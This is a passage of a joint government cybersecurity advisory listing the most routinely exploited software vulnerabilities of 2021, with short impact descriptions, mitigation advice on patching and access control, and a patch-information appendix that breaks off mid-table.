2021 Top Routinely Exploited Vulnerabilities

2022-04-28T12:00:00

Description

### Summary This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom’s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited. U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. The cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors. Download the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb). ### Technical Details #### **Key Findings** Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities—some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor. #### **Top 15 Routinely Exploited Vulnerabilities** Table 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include: * **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch. * **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network. * **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. * **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021. Three of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors. _Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_ CVE | Vulnerability Name | Vendor and Product | Type ---|---|---|--- [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) | Log4Shell | Apache Log4j | Remote code execution (RCE) [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | | Zoho ManageEngine AD SelfService Plus | RCE [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | ProxyShell | Microsoft Exchange Server | Elevation of privilege [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | ProxyShell | Microsoft Exchange Server | RCE [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | ProxyShell | Microsoft Exchange Server | Security feature bypass [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | ProxyLogon | Microsoft Exchange Server | RCE [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | ProxyLogon | Microsoft Exchange Server | RCE [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | ProxyLogon | Microsoft Exchange Server | RCE [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | ProxyLogon | Microsoft Exchange Server | RCE [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | | Atlassian Confluence Server and Data Center | Arbitrary code execution [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) | | VMware vSphere Client | RCE [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | ZeroLogon | Microsoft Netlogon Remote Protocol (MS-NRPC) | Elevation of privilege [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | | Microsoft Exchange Server | RCE [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | | Pulse Secure Pulse Connect Secure | Arbitrary file reading [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | | Fortinet FortiOS and FortiProxy | Path traversal #### **Additional Routinely Exploited Vulnerabilities** In addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. These vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882. _Table 2: Additional Routinely Exploited Vulnerabilities in 2021_ CVE | Vendor and Product | Type ---|---|--- [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>) | Sitecore XP | RCE [CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>) | ForgeRock OpenAM server | RCE [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) | Accellion FTA | OS command execution [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) | Accellion FTA | Server-side request forgery [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) | Accellion FTA | OS command execution [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) | Accellion FTA | SQL injection [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>) | VMware vCenter Server | RCE [CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>) | SonicWall Secure Mobile Access (SMA) | RCE [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) | Microsoft MSHTML | RCE [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) | Microsoft Windows Print Spooler | RCE [CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>) | Sudo | Privilege escalation [CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>) | Checkbox Survey | Remote arbitrary code execution [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>) | Pulse Secure Pulse Connect Secure | Remote arbitrary code execution [CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWall SSLVPN SMA100 | Improper SQL command neutralization, allowing for credential access [CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) | Windows Print Spooler | RCE [CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP QTS and QuTS hero | Remote arbitrary code execution [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller (ADC) and Gateway | Arbitrary code execution [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik UI for ASP.NET AJAX | Code execution [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco IOS Software and IOS XE Software | Remote arbitrary code execution [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft Office | RCE [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft Office | RCE ### Mitigations #### **Vulnerability and Configuration Management** * Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds. * Use a centralized patch management system. * Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021. * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources. * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>) * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>) #### **Identity and Access Management** * Enforce multifactor authentication (MFA) for all users, without exception. * Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. * Regularly review, validate, or remove privileged accounts (annually at a minimum). * Configure access control under the concept of least privilege principle. * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges). **Note:** see [CISA Capacity Enhancement Guide – Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems. #### **Protective Controls and Architecture ** * Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP. * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting. * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM). * Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. * Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware. * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets. * Monitor the environment for potentially unwanted programs. * Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions. * Implement application allowlisting. ### **Resources** * For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) * For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>). * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA. ### **Disclaimer** The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring. ### **Purpose ** This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. ### **References** [1] [CISA’s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) ### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities** CVE | Vendor | Affected Products | Patch Information | Resources ---|---|---|---|--- [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>) | Sitecore | Sitecore XP 7.5.0 - Sitecore XP 7.5.2 Sitecore XP 8.0.0 - Sitecore XP 8.2.7 | [Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>) | ACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>) [CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>) | ForgeRock | Access Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3 OpenAM 9.x, 10.x, 11.x, 12.x and 13.x | [ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) | ACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>) CCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>) [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) | Accellion | FTA 9_12_370 and earlier | [Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>) | Joint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>) ACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>) [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) | FTA 9_12_411 and earlier [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) | FTA versions 9_12_411 and earlier [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) | FTA 9_12_370 and earlier | [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>) | VMware | vCenter Server 7.0, 6.7, 6.5 Cloud Foundation (vCenter Server) 4.x and 3.x | [VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) | CCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>) [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) | VMware | vCenter Server 7.0, 6.7, 6.5 Cloud Foundation (vCenter Server) 4.x and 3.x | [VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) | ACSC Alert [VMware vCenter Server plugin remote code execution vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>) CCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>) CCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) [CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>) | SonicWall | SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv | [SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) | ACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>) CCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>) [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) | Apache | Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>). | [Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>) For additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) | CISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) CCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>) [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) | Zoho ManageEngine | ADSelfService Plus version 6113 and prior | [Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release ](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) | Joint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>) CCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>) [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) | [Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) | [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) | [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) | Joint CSA [Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>) CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) | Microsoft | Microsoft Exchange Server 2013 Cumulative Update 23 Microsoft Exchange Server 2016 Cumulative Updates 19 and 20 Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 | [Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>) | Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) ACSC Alert [Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/acsc/view-all-content/alerts/microsoft-exchange-proxyshell-targeting-australia>) [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) | Microsoft | Multiple Exchange Server versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) | Microsoft | Multiple Exchange Server versions; see [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) | [Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) [CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>) | Sudo | Sudo before 1.9.5p2 | [Sudo Stable Release 1.9.5p2](<https://www.sudo.ws/releases/stable/#1.9.5p2>) | [CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>) | Checkbox Survey | Checkbox Survey versions prior to 7 | | [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | Microsoft Exchange Server | Multiple versions; see: [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>) | CISA Alert: [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>) ACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>) CCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>) [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | Jira Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. | [Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) | ACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>) CCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>) | Pulse Secure | PCS 9.0R3/9.1R1 and Higher | [Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) | CCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) [CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWall | SMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v) | [SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>) | [CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) | [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) | CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) [CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP | QTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>) QuTS hero h4.5.1.1491 build 20201119 and later | [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>) | [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Microsoft | Windows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | ACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>) Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>) CCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>) Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>) CCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24 NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds 